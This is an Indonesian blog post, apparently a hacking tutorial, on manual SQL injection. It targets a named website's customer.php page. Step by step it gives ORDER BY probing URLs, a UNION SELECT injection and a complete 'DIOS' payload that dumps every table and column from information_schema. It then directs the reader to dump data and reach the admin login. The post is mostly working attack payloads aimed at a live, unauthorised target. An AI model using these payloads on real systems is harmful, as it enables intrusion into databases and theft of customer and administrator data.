Dalam SQL manual ini ada yang nama nya Query DIOS (Dump In One Shot) yang artinya Dump dalam satu tindakkan . jadi disini kita bisa mengetahui semua tabel" dan column menyeluruh dengan satu tindakkan. langsung saja yah kawan.
1. Disini saya sudah mempunyai target VULN SQLi.
http://bbspeb.com/main/customer.php?id=43'
2. kita lakukan Order By seperti biasa.
http://bbspeb.com/main/customer.php?id=-43 order by 1--+ ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 2--+ ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 3--+ ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 4--+ ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 5--+ ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 6--+ ( error )
berarti tabel count nya yang NORMAL sampai 5 .
3. lalu lakukan Union Select seperti biasa.
http://bbspeb.com/main/customer.php?id=-43 union select 1,2,3,4,5--+
Angka ajaibnya yang muncul adalah nomer 4
lalu beri query DIOS dibawah pada angka ajaib yang keluar tersebut.
(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')',column_name), (column_name))))))a)
copy DIOS diatas , lalu pastekan di angka ajaib tersebut lalu ENTER .
Muncul semua deh ^_^ .. tanpa harus capek" membuka satu" table nya.
keterangan :
sebelah tanda :: seperti contoh disitu ada category itu TABLE nya.
dan dibawah itu adalah column nya :)
4. selanjutnya Dump column yang kamu inginkan, kalo dump untuk melihat isi column nya cukup dengan cara seperti biasa saja lah :)
5. Tinggal menuju Login Admin nya deh.
Terima kasih semoga bermanfaat.
Salam hacking
No comments:
Post a Comment